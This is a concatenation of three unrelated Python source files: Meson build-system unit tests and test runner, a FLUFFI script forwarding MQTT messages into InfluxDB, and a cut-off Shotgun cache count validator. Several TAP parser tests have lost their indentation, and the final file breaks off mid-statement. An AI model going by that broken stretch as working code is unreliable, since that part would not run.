        events = self.parse_tap('1..4\nok 1\nnot ok 2\nok 3\nnot ok 4')
        self.assert_plan(events, num_tests=4, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_test(events, number=3, name='', result=TestResult.OK)
        self.assert_test(events, number=4, name='', result=TestResult.FAIL)
        self.assert_last(events)
    def test_many_late_plan(self):
        # Plan after the tests: late=True.
        events = self.parse_tap('ok 1\nnot ok 2\nok 3\nnot ok 4\n1..4')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_test(events, number=3, name='', result=TestResult.OK)
        self.assert_test(events, number=4, name='', result=TestResult.FAIL)
        self.assert_plan(events, num_tests=4, late=True)
        self.assert_last(events)
    def test_directive_case(self):
        # Directive keywords are case-insensitive.
        events = self.parse_tap('ok 1 abc # skip')
        self.assert_test(events, number=1, name='abc', result=TestResult.SKIP)
        self.assert_last(events)
        events = self.parse_tap('ok 1 abc # ToDo')
        self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS)
        self.assert_last(events)
    def test_directive_explanation(self):
        # Text after the directive keyword becomes the explanation.
        events = self.parse_tap('ok 1 abc # skip why')
        self.assert_test(events, number=1, name='abc', result=TestResult.SKIP,
                         explanation='why')
        self.assert_last(events)
        events = self.parse_tap('ok 1 abc # ToDo Because')
        self.assert_test(events, number=1, name='abc', result=TestResult.UNEXPECTEDPASS,
                         explanation='Because')
        self.assert_last(events)
    def test_one_test_early_plan(self):
        events = self.parse_tap('1..1\nok')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_one_test_late_plan(self):
        events = self.parse_tap('ok\n1..1')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_plan(events, num_tests=1, late=True)
        self.assert_last(events)
def test_out_of_order(self):
events = self.parse_tap('ok 2')
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_middle_plan(self):
events = self.parse_tap('ok 1\n1..2\nok 2')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_plan(events, num_tests=2, late=True)
self.assert_error(events)
self.assert_test(events, number=2, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many_plans(self):
events = self.parse_tap('1..1\n1..2\nok 1')
self.assert_plan(events, num_tests=1, late=False)
self.assert_error(events)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_last(events)
def test_too_many(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..1')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=1, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..1\nok 1\nnot ok 2')
self.assert_plan(events, num_tests=1, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
def test_too_few(self):
events = self.parse_tap('ok 1\nnot ok 2\n1..3')
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_plan(events, num_tests=3, late=True)
self.assert_error(events)
self.assert_last(events)
events = self.parse_tap('1..3\nok 1\nnot ok 2')
self.assert_plan(events, num_tests=3, late=False)
self.assert_test(events, number=1, name='', result=TestResult.OK)
self.assert_test(events, number=2, name='', result=TestResult.FAIL)
self.assert_error(events)
self.assert_last(events)
    def test_too_few_bailout(self):
        """A 'Bail out!' line explains the missing results, so no too-few error is emitted."""
        events = self.parse_tap('1..3\nok 1\nnot ok 2\nBail out! no third test')
        self.assert_plan(events, num_tests=3, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_bailout(events, message='no third test')
        self.assert_last(events)
    def test_diagnostics(self):
        """Diagnostic lines (starting with '#') are ignored wherever they appear."""
        events = self.parse_tap('1..1\n# ignored\nok 1')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)

        events = self.parse_tap('# ignored\n1..1\nok 1\n# ignored too')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)

        events = self.parse_tap('# ignored\nok 1\n1..1\n# ignored too')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_plan(events, num_tests=1, late=True)
        self.assert_last(events)
    def test_empty_line(self):
        """Blank lines in the TAP stream are ignored."""
        events = self.parse_tap('1..1\n\nok 1')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_unexpected(self):
        """A line that matches no TAP construct produces an error event."""
        events = self.parse_tap('1..1\ninvalid\nok 1')
        self.assert_plan(events, num_tests=1, late=False)
        self.assert_error(events)
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_last(events)
    def test_version(self):
        """Only 'TAP version 13' is accepted, and only as the very first line."""
        events = self.parse_tap('TAP version 13\n')
        self.assert_version(events, version=13)
        self.assert_last(events)

        # Version 12 is not a valid explicit version declaration.
        events = self.parse_tap('TAP version 12\n')
        self.assert_error(events)
        self.assert_last(events)

        # A version line after any other content is an error.
        events = self.parse_tap('1..0\nTAP version 13\n')
        self.assert_plan(events, num_tests=0, late=False, skipped=True)
        self.assert_error(events)
        self.assert_last(events)
    def test_yaml(self):
        """TAP v13 YAML blocks ('---' ... '...') attach to the preceding result; an
        unterminated block is an error."""
        events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def\n ...\nok 2')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_test(events, number=2, name='', result=TestResult.OK)
        self.assert_last(events)

        # YAML block not closed before end of input.
        events = self.parse_tap_v13('ok\n ---\n foo: abc\n bar: def')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_error(events)
        self.assert_last(events)

        # YAML block not closed before the next test line.
        events = self.parse_tap_v13('ok 1\n ---\n foo: abc\n bar: def\nnot ok 2')
        self.assert_test(events, number=1, name='', result=TestResult.OK)
        self.assert_error(events)
        self.assert_test(events, number=2, name='', result=TestResult.FAIL)
        self.assert_last(events)
class SubprojectsCommandTests(BasePlatformTests):
    """Tests for the `meson subprojects` command (download, update, foreach, purge).

    A dummy project is created under the build dir with its own subprojects/
    directory; "remote" git repositories live next to it under root_dir so no
    network access is needed.
    """
    def setUp(self):
        super().setUp()
        self.root_dir = Path(self.builddir)

        # The project under test, with its own subprojects/ and packagecache/.
        self.project_dir = self.root_dir / 'src'
        self._create_project(self.project_dir)

        self.subprojects_dir = self.project_dir / 'subprojects'
        os.makedirs(str(self.subprojects_dir))
        self.packagecache_dir = self.subprojects_dir / 'packagecache'
        os.makedirs(str(self.packagecache_dir))

    def _create_project(self, path, project_name='dummy'):
        # Write a minimal meson.build so `path` is a valid meson project.
        os.makedirs(str(path), exist_ok=True)
        with open(str(path / 'meson.build'), 'w') as f:
            f.write(f"project('{project_name}')")

    def _git(self, cmd, workdir):
        # Run a git command in `workdir`; raises on failure, returns stripped stdout.
        return git(cmd, str(workdir), check=True)[1].strip()

    def _git_config(self, workdir):
        # Commit identity required by `git commit` in a fresh repository.
        self._git(['config', 'user.name', 'Meson Test'], workdir)
        self._git(['config', 'user.email', 'meson.test@example.com'], workdir)

    def _git_remote(self, cmd, name):
        # Run git in the fake "remote" repository for subproject `name`.
        return self._git(cmd, self.root_dir / name)

    def _git_local(self, cmd, name):
        # Run git in the checked-out subproject `name`.
        return self._git(cmd, self.subprojects_dir / name)

    def _git_local_branch(self, name):
        # Same as `git branch --show-current` but compatible with older git version
        branch = self._git_local(['rev-parse', '--abbrev-ref', 'HEAD'], name)
        # rev-parse prints the literal string 'HEAD' when detached; report '' then.
        return branch if branch != 'HEAD' else ''

    def _git_local_commit(self, name, ref='HEAD'):
        return self._git_local(['rev-parse', ref], name)

    def _git_remote_commit(self, name, ref='HEAD'):
        return self._git_remote(['rev-parse', ref], name)

    def _git_create_repo(self, path):
        # If a user has git configuration init.defaultBranch set we want to override that
        with tempfile.TemporaryDirectory() as d:
            out = git(['--version'], str(d))[1]
        if version_compare(mesonbuild.environment.search_version(out), '>= 2.28'):
            extra_cmd = ['--initial-branch', 'master']
        else:
            extra_cmd = []
        self._create_project(path)
        self._git(['init'] + extra_cmd, path)
        self._git_config(path)
        self._git(['add', '.'], path)
        self._git(['commit', '-m', 'Initial commit'], path)

    def _git_create_remote_repo(self, name):
        self._git_create_repo(self.root_dir / name)

    def _git_create_local_repo(self, name):
        self._git_create_repo(self.subprojects_dir / name)

    def _git_create_remote_commit(self, name, branch):
        self._git_remote(['checkout', branch], name)
        self._git_remote(['commit', '--allow-empty', '-m', f'initial {branch} commit'], name)

    def _git_create_remote_branch(self, name, branch):
        self._git_remote(['checkout', '-b', branch], name)
        self._git_remote(['commit', '--allow-empty', '-m', f'initial {branch} commit'], name)

    def _git_create_remote_tag(self, name, tag):
        self._git_remote(['commit', '--allow-empty', '-m', f'tag {tag} commit'], name)
        self._git_remote(['tag', tag], name)

    def _wrap_create_git(self, name, revision='master'):
        # Write a [wrap-git] file pointing at the fake remote repository.
        path = self.root_dir / name
        with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
            f.write(textwrap.dedent(
                '''
                [wrap-git]
                url={}
                revision={}
                '''.format(os.path.abspath(str(path)), revision)))

    def _wrap_create_file(self, name, tarball='dummy.tar.gz'):
        # Write a [wrap-file] file and pre-seed the package cache with the tarball.
        path = self.root_dir / tarball
        with open(str((self.subprojects_dir / name).with_suffix('.wrap')), 'w') as f:
            f.write(textwrap.dedent(
                f'''
                [wrap-file]
                source_url={os.path.abspath(str(path))}
                source_filename={tarball}
                '''))
        Path(self.packagecache_dir / tarball).touch()

    def _subprojects_cmd(self, args):
        # Invoke `meson subprojects <args>` inside the test project.
        return self._run(self.meson_command + ['subprojects'] + args, workdir=str(self.project_dir))

    def test_git_update(self):
        subp_name = 'sub1'

        # Create a fake remote git repository and a wrap file. Checks that
        # "meson subprojects download" works.
        self._git_create_remote_repo(subp_name)
        self._wrap_create_git(subp_name)
        self._subprojects_cmd(['download'])
        self.assertPathExists(str(self.subprojects_dir / subp_name))
        self._git_config(self.subprojects_dir / subp_name)

        # Create a new remote branch and update the wrap file. Checks that
        # "meson subprojects update --reset" checkout the new branch.
        self._git_create_remote_branch(subp_name, 'newbranch')
        self._wrap_create_git(subp_name, 'newbranch')
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))

        # Update remote newbranch. Checks the new commit is pulled into existing
        # local newbranch. Make sure it does not print spurious 'git stash' message.
        self._git_create_remote_commit(subp_name, 'newbranch')
        out = self._subprojects_cmd(['update', '--reset'])
        self.assertNotIn('No local changes to save', out)
        self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))

        # Update remote newbranch and switch to another branch. Checks that it
        # switch current branch to newbranch and pull latest commit.
        self._git_local(['checkout', 'master'], subp_name)
        self._git_create_remote_commit(subp_name, 'newbranch')
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))

        # Stage some local changes then update. Checks that local changes got
        # stashed.
        self._create_project(self.subprojects_dir / subp_name, 'new_project_name')
        self._git_local(['add', '.'], subp_name)
        self._git_create_remote_commit(subp_name, 'newbranch')
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_branch(subp_name), 'newbranch')
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newbranch'))
        self.assertTrue(self._git_local(['stash', 'list'], subp_name))

        # Create a new remote tag and update the wrap file. Checks that
        # "meson subprojects update --reset" checkout the new tag in detached mode.
        self._git_create_remote_tag(subp_name, 'newtag')
        self._wrap_create_git(subp_name, 'newtag')
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_branch(subp_name), '')
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name, 'newtag'))

        # Create a new remote commit and update the wrap file with the commit id.
        # Checks that "meson subprojects update --reset" checkout the new commit
        # in detached mode.
        self._git_local(['checkout', 'master'], subp_name)
        self._git_create_remote_commit(subp_name, 'newbranch')
        new_commit = self._git_remote(['rev-parse', 'HEAD'], subp_name)
        self._wrap_create_git(subp_name, new_commit)
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_branch(subp_name), '')
        self.assertEqual(self._git_local_commit(subp_name), new_commit)

        # Create a local project not in a git repository, then update it with
        # a git wrap. Without --reset it should print error message and return
        # failure. With --reset it should delete existing project and clone the
        # new project.
        subp_name = 'sub2'
        self._create_project(self.subprojects_dir / subp_name)
        self._git_create_remote_repo(subp_name)
        self._wrap_create_git(subp_name)
        with self.assertRaises(subprocess.CalledProcessError) as cm:
            self._subprojects_cmd(['update'])
        self.assertIn('Not a git repository', cm.exception.output)
        self._subprojects_cmd(['update', '--reset'])
        self.assertEqual(self._git_local_commit(subp_name), self._git_remote_commit(subp_name))

    @skipIfNoExecutable('true')
    def test_foreach(self):
        """`meson subprojects foreach` runs a command in each subproject, optionally
        filtered by wrap type."""
        self._create_project(self.subprojects_dir / 'sub_file')
        self._wrap_create_file('sub_file')
        self._git_create_local_repo('sub_git')
        self._wrap_create_git('sub_git')
        self._git_create_local_repo('sub_git_no_wrap')

        def ran_in(s):
            # Extract (sorted) the directories the command was reported to run in.
            ret = []
            prefix = 'Executing command in '
            for l in s.splitlines():
                if l.startswith(prefix):
                    ret.append(l[len(prefix):])
            return sorted(ret)

        dummy_cmd = ['true']
        out = self._subprojects_cmd(['foreach'] + dummy_cmd)
        self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git', 'subprojects/sub_git_no_wrap']))
        out = self._subprojects_cmd(['foreach', '--types', 'git,file'] + dummy_cmd)
        self.assertEqual(ran_in(out), sorted(['subprojects/sub_file', 'subprojects/sub_git']))
        out = self._subprojects_cmd(['foreach', '--types', 'file'] + dummy_cmd)
        self.assertEqual(ran_in(out), ['subprojects/sub_file'])
        out = self._subprojects_cmd(['foreach', '--types', 'git'] + dummy_cmd)
        self.assertEqual(ran_in(out), ['subprojects/sub_git'])

    def test_purge(self):
        """`meson subprojects purge` deletes checkouts (and, with --include-cache,
        cached tarballs); only --confirm actually removes files."""
        self._create_project(self.subprojects_dir / 'sub_file')
        self._wrap_create_file('sub_file')
        self._git_create_local_repo('sub_git')
        self._wrap_create_git('sub_git')

        def deleting(s) -> T.List[str]:
            # Extract (sorted) the paths reported as being deleted.
            ret = []
            prefix = 'Deleting '
            for l in s.splitlines():
                if l.startswith(prefix):
                    ret.append(l[len(prefix):])
            return sorted(ret)

        out = self._subprojects_cmd(['purge'])
        self.assertEqual(deleting(out), [str(self.subprojects_dir / 'sub_file'), str(self.subprojects_dir / 'sub_git')])
        out = self._subprojects_cmd(['purge', '--include-cache'])
        self.assertEqual(deleting(out), [str(self.subprojects_dir / 'packagecache' / 'dummy.tar.gz'), str(self.subprojects_dir / 'sub_file'), str(self.subprojects_dir / 'sub_git')])
        out = self._subprojects_cmd(['purge', '--include-cache', '--confirm'])
        self.assertEqual(deleting(out), [str(self.subprojects_dir / 'packagecache' / 'dummy.tar.gz'), str(self.subprojects_dir / 'sub_file'), str(self.subprojects_dir / 'sub_git')])
        self.assertFalse(Path(self.subprojects_dir / 'packagecache' / 'dummy.tar.gz').exists())
        self.assertFalse(Path(self.subprojects_dir / 'sub_file').exists())
        self.assertFalse(Path(self.subprojects_dir / 'sub_git').exists())
def _clang_at_least(compiler: 'Compiler', minver: str, apple_minver: T.Optional[str]) -> bool:
    """Return True if the Clang compiler meets the required minimum version.

    AppleClang and vanilla Clang use different version numbering schemes, so
    each gets its own minimum: ``apple_minver`` applies to AppleClang (``None``
    meaning the check can never be satisfied), ``minver`` to regular Clang.
    """
    apple_compilers = (mesonbuild.compilers.AppleClangCCompiler,
                       mesonbuild.compilers.AppleClangCPPCompiler)
    if not isinstance(compiler, apple_compilers):
        return version_compare(compiler.version, minver)
    if apple_minver is None:
        return False
    return version_compare(compiler.version, apple_minver)
def unset_envs():
    """Strip compiler- and linker-flag variables from the environment.

    For unit tests we must fully control all command lines so that there are
    no unexpected changes coming from the environment, for example when doing
    a package build.
    """
    flag_vars = ['CPPFLAGS', 'LDFLAGS']
    flag_vars += list(mesonbuild.compilers.compilers.CFLAGS_MAPPING.values())
    for name in flag_vars:
        # pop() with a default is a no-op when the variable is absent.
        os.environ.pop(name, None)
def convert_args(argv):
    """Translate unittest-style command line arguments into pytest arguments.

    Dash-prefixed flags are forwarded (with -f/--failfast mapped to pytest's
    --exitfirst); positional test selections are combined into a single
    pytest ``-k`` expression.
    """
    pytest_args = []
    if '-v' in argv:
        pytest_args.append('-v')
    selections = []
    for arg in argv:
        if arg.startswith('-'):
            pytest_args.append('--exitfirst' if arg in ('-f', '--failfast') else arg)
        elif '.' in arg:
            # ClassName.test_name => 'ClassName and test_name'
            selections.append(' and '.join(arg.split('.')))
        else:
            selections.append(arg)
    if selections:
        pytest_args += ['-k', ' or '.join(selections)]
    return pytest_args
def running_single_tests(argv, cases):
    '''
    Check whether we only got arguments for running individual tests, not
    entire testcases, and not all testcases (no test args).
    '''
    saw_single_test = False
    for arg in (a for a in argv if not a.startswith('-')):
        if any(arg.startswith(case) for case in cases):
            if '.' not in arg:
                # A bare testcase name selects the whole case.
                return False
            saw_single_test = True
    return saw_single_test
def setup_backend():
    """Pull any ``--backend=...`` option out of sys.argv and export it.

    Since we invoke the tests via unittest or xtest test runner we need to
    pass the backend to use to the spawned process via this side channel.
    Yes it sucks, but at least it is fully internal to this file.
    """
    backend_opts = [a for a in sys.argv if a.startswith('--backend')]
    # Last occurrence wins, defaulting to ninja.
    backend = backend_opts[-1].split('=')[1] if backend_opts else 'ninja'
    os.environ['MESON_UNIT_TEST_BACKEND'] = backend
    sys.argv = [a for a in sys.argv if not a.startswith('--backend')]
def main():
    """Run the full unit-test suite, preferring pytest (with xdist) over unittest.

    Returns a process exit code (pytest's returncode), or hands control to
    unittest.main() when pytest/pytest-xdist are unavailable.
    """
    unset_envs()
    setup_backend()
    # All test case class names; also used to build the unittest fallback.
    cases = ['InternalTests', 'DataTests', 'AllPlatformTests', 'FailureTests',
             'PythonTests', 'NativeFileTests', 'RewriterTests', 'CrossFileTests',
             'TAPParserTests', 'SubprojectsCommandTests',
             'LinuxlikeTests', 'LinuxCrossArmTests', 'LinuxCrossMingwTests',
             'WindowsTests', 'DarwinTests']

    try:
        import pytest # noqa: F401
        # Need pytest-xdist for `-n` arg
        import xdist # noqa: F401
        pytest_args = []
        # Don't use pytest-xdist when running single unit tests since it wastes
        # time spawning a lot of processes to distribute tests to in that case.
        if not running_single_tests(sys.argv, cases):
            pytest_args += ['-n', 'auto']
        # Let there be colors!
        if 'CI' in os.environ:
            pytest_args += ['--color=yes']
        pytest_args += ['./run_unittests.py']
        pytest_args += convert_args(sys.argv[1:])
        return subprocess.run(python_command + ['-m', 'pytest'] + pytest_args).returncode
    except ImportError:
        print('pytest-xdist not found, using unittest instead')
        # Fallback to plain unittest.
        return unittest.main(defaultTest=cases, buffer=True)
if __name__ == '__main__':
    # Set up the MSVC developer environment when needed (no-op elsewhere).
    setup_vsenv()
    print('Meson build system', mesonbuild.coredata.version, 'Unit Tests')
    start = time.monotonic()
    try:
        raise SystemExit(main())
    finally:
        # Always report the total wall-clock time, even when exiting early.
        print('Total time: {:.3f} seconds'.format(time.monotonic() - start))
|
sync.py | #!/usr/bin/env python3
# Copyright 2017-2020 Siemens AG
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including without
# limitation the rights to use, copy, modify, merge, publish, distribute,
# sublicense, and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
#
# Author(s): Roman Bendt, Thomas Riedmaier
import paho.mqtt.client as mqtt
import datetime
import time
import math
from threading import Thread, Lock
from influxdb import InfluxDBClient
mutex = Lock()
cumulated_json = []
seenmachines = {}
def watchdog_push():
    """Background thread: every 5 seconds, flush accumulated points to InfluxDB.

    Also emits one 'lastseen' point per known machine containing the whole
    number of seconds since that machine last reported, so stale machines can
    be detected from the database.
    """
    global seenmachines, mutex, cumulated_json
    while True:
        time.sleep(5)
        now = datetime.datetime.utcnow()
        json_body = []
        # NOTE(review): seenmachines is read here without holding `mutex`
        # while on_message() mutates it — looks racy; confirm intent.
        for machine, lastseen in seenmachines.items():
            json_body.append({
                "measurement": "lastseen",
                "tags": {
                    "machine": machine,
                },
                "time": now,
                "fields": {
                    # Whole seconds since the machine last reported.
                    "value": math.ceil((now - lastseen).total_seconds())
                }
            })
        print("=========================== POSTING ACUMULATED DATA ===========================")
        sendingcopy = []
        with mutex:
            # BUG FIX: was `if len(json_body) is not 0:` — `is not` compares
            # object identity, not value; use truthiness instead.
            if json_body:
                cumulated_json.extend(json_body)
            # Hand the accumulated batch off and start a fresh list.
            sendingcopy = cumulated_json
            cumulated_json = []
        dbclient.write_points(sendingcopy)
def on_message(client, userdata, msg):
    """MQTT callback: convert an incoming FLUFFI message into InfluxDB points.

    Topic layout (first component 'FLUFFI' is stripped):
      FLUFFI/state/machine/measurement
      FLUFFI/webui/measurement
      FLUFFI/cmd/commandname
    """
    global seenmachines, mutex, cumulated_json
    info = msg.topic.split('/')[1:]
    # Use utc as timestamp
    receiveTime = datetime.datetime.utcnow()
    message = msg.payload.decode("utf-8")
    isfloatValue = False
    try:
        # Convert the string to a float so that it is stored as a number and not a string in the database
        val = float(message)
        isfloatValue = True
    except ValueError:
        # BUG FIX: was a bare `except:`, which also swallowed SystemExit /
        # KeyboardInterrupt; float() only raises ValueError for a str input.
        print("Could not convert " + message + " to a float value")
        val = message
        isfloatValue = False
    print(str(receiveTime) + ": " + msg.topic + " " + str(val))
    json_body = []
    if info[0] == "cmd":
        # FLUFFI/cmd/forget-machine <machinename>
        if info[1] == "forget-machine":
            print("order to delete", message)
            with mutex:
                try:
                    del seenmachines[message]
                except KeyError:
                    # Already forgotten; nothing to do.
                    pass
        else:
            # Unknown commands are ignored.
            pass
    elif info[0] == "state":
        if isfloatValue:
            machine = info[1]
            measurement = info[2]
            if ':' in measurement:
                # "measurement:suffix" folds the suffix into the machine tag.
                mspl = measurement.split(':')
                measurement = mspl[0]
                machine += mspl[1]
            json_body = [
                {
                    "measurement": measurement,
                    "tags": {
                        "machine": machine,
                    },
                    "time": receiveTime,
                    "fields": {
                        "value": val
                    }
                }
            ]
            with mutex:
                seenmachines[info[1]] = receiveTime
    elif info[0] == "webui":
        if isfloatValue:
            submodule = info[0] # always webui
            measurement = info[1]
            json_body = [
                {
                    "measurement": measurement,
                    "tags": {
                        "webui": submodule,
                    },
                    "time": receiveTime,
                    "fields": {
                        "value": val
                    }
                }
            ]
            with mutex:
                seenmachines['webui'] = receiveTime
    else:
        print("invalid module received")
        return
    # BUG FIX: was `if len(json_body) is not 0:` (identity comparison on an
    # int); plain truthiness is the correct and idiomatic check.
    if json_body:
        with mutex:
            cumulated_json.extend(json_body)
def on_connect(client, userdata, flags, rc):
    """MQTT connect callback: report the result code and (re)subscribe.

    Subscribing here rather than once at startup means the subscription is
    re-established automatically after a reconnect.  QoS 2 requests
    exactly-once delivery for every FLUFFI subtopic.
    """
    print("Connected with result code " + str(rc))
    client.subscribe("FLUFFI/#", 2)
def on_disconnect(client, userdata, rc=0):
    """MQTT disconnect callback: report the reason and stop the network loop."""
    print("disconnected with result code ", str(rc))
    client.loop_stop()
# Set up a client for InfluxDB
dbclient = InfluxDBClient('localhost', 8086, 'root', 'root', 'FLUFFI')

# Initialize the MQTT client that should connect to the broker
client = mqtt.Client()
client.on_connect = on_connect
client.on_message = on_message

# thread to collect and send data
t = Thread(target=watchdog_push)

# Retry until the broker is reachable: 5 s connect timeout, 2 s between attempts.
conOK = False
while(conOK == False):
    try:
        client.connect("localhost", 1883, 5)
        conOK = True
    except:
        conOK = False
        time.sleep(2)

# start collector
t.start()

# loop to the broker
client.loop_start()

# Keep the main thread alive; callbacks run on the MQTT network thread and
# the watchdog thread does the actual pushing.
while True:
    time.sleep(5)
|
validateCounts.py | import os
import time
import logging
import datetime
import multiprocessing
import Queue
import rethinkdb
__all__ = [
'CountValidator'
]
LOG = logging.getLogger(__name__)
class CountValidator(object):
    """Validates that cached entity counts match the live Shotgun counts.

    Spawns worker processes (CountValidateWorker) that compare, per entity
    type, the number of entities reported by Shotgun with the number stored
    in the rethinkdb cache.
    """
    def __init__(self, config, entityConfigs):
        super(CountValidator, self).__init__()
        self.config = config
        self.entityConfigs = entityConfigs
        # JoinableQueue so run() can block until every work item is processed.
        self.workQueue = multiprocessing.JoinableQueue()
        self.resultQueue = multiprocessing.Queue()
        self.processes = []
        self.results = []

    def start(self, raiseExc=True):
        """Run a full validation pass; optionally raise if any type mismatched.

        Returns the list of per-type result dicts.
        """
        LOG.info("Starting Validate Counts")
        self.launchWorkers()
        self.run()
        self.terminateWorkers()
        if raiseExc:
            failed = []
            for result in self.results:
                if result['failed']:
                    failed.append(result)
            if len(failed):
                raise RuntimeError("Validation Failed, {0} cached entity type(s) do not match".format(len(failed)))
        return self.results

    def launchWorkers(self):
        # No point launching more workers than there are entity types.
        processCount = min(len(self.entityConfigs), self.config['validate_counts.processes'])
        LOG.debug("Launching {0} validate workers".format(processCount))
        for n in range(processCount):
            worker = CountValidateWorker(self.workQueue, self.resultQueue, self.config, self.entityConfigs)
            proc = multiprocessing.Process(target=worker.start)
            proc.start()
            self.processes.append(proc)

    def run(self):
        # Queue one work item per entity type, wait for completion, then drain results.
        LOG.debug("Adding items to validate queue")
        for config in self.entityConfigs:
            data = {'configType': config.type}
            self.workQueue.put(data)
        # Blocks until each item has been task_done()'d by a worker.
        self.workQueue.join()
        results = []
        while True:
            try:
                result = self.resultQueue.get(False)
            except Queue.Empty:
                break
            else:
                if result:
                    results.append(result)
        self.results = results

    def terminateWorkers(self):
        # Workers loop forever, so they must be terminated explicitly.
        LOG.debug("Terminating validate workers")
        for proc in self.processes:
            proc.terminate()
        self.processes = []
class CountValidateWorker(object):
    """Worker process: compares Shotgun entity counts against the cache.

    Pulls entity type names off the work queue, counts entities in Shotgun
    and in the rethinkdb cache, adjusts for event log entries that have not
    been folded into the cache yet, and posts one result dict per type.
    """
    def __init__(self, workQueue, resultQueue, config, entityConfigs):
        super(CountValidateWorker, self).__init__()
        self.workQueue = workQueue
        self.resultQueue = resultQueue
        self.config = config
        # Map entity type name -> config for O(1) lookup per work item.
        self.entityConfigs = dict([(c.type, c) for c in entityConfigs])
        self.sg = None
        self.rethink = None

    def start(self):
        # Connections are created in the child process; they cannot be
        # pickled across the multiprocessing boundary.
        self.sg = self.config.createShotgunConnection(convert_datetimes_to_utc=False)
        self.rethink = self.config.createRethinkConnection()
        self.run()

    def run(self):
        workerPID = os.getpid()
        LOG.debug("Validate Worker Running: {0}".format(workerPID))
        while True:
            try:
                work = self.workQueue.get()
            # BUG FIX: was `except Queue.Emtpy:` (typo) — if the except clause
            # were ever evaluated it would itself raise AttributeError.
            # (A blocking get() never raises Empty, but the handler must be valid.)
            except Queue.Empty:
                continue
            time.sleep(0.1)
            entityConfig = self.entityConfigs[work['configType']]

            LOG.debug("Getting Shotgun counts for type: '{0}'".format(work['configType']))
            sgResult = self.sg.summarize(entityConfig.type, [], summary_fields=[{'field': 'id', 'type': 'count'}])
            sgCount = sgResult['summaries']['id']

            cacheCount = 0
            try:
                LOG.debug("Getting cache counts for type: '{0}'".format(work['configType']))
                cacheSearchTime = datetime.datetime.utcnow()
                cacheCount = rethinkdb.table(entityConfig['table']).count().run(self.rethink)
            except rethinkdb.errors.RqlRuntimeError:
                # Table doesn't exist (yet); treat as zero cached entities.
                cacheCount = 0

            # Find the diff of events that have happened in Shotgun, but not been saved to the cache yet
            # Searches all event log entries for this entity type that are New, Retired, or Revive occurring in the past fetch_interval
            # including a small amount of processing padding for the cache
            self.config.history.load()
            latestCachedEventID = self.config.history['latest_event_log_entry']['id']
            minTime = cacheSearchTime - datetime.timedelta(seconds=self.config['monitor.fetch_interval'] + 0.05)
            maxTime = cacheSearchTime
            eventTypes = ['Shotgun_{entityType}_{changeType}'.format(entityType=entityConfig.type, changeType=t) for t in ['New', 'Retirement', 'Revival']]
            eventLogFilters = [
                ['event_type', 'in', eventTypes],
                ['created_at', 'between', [minTime, maxTime]],
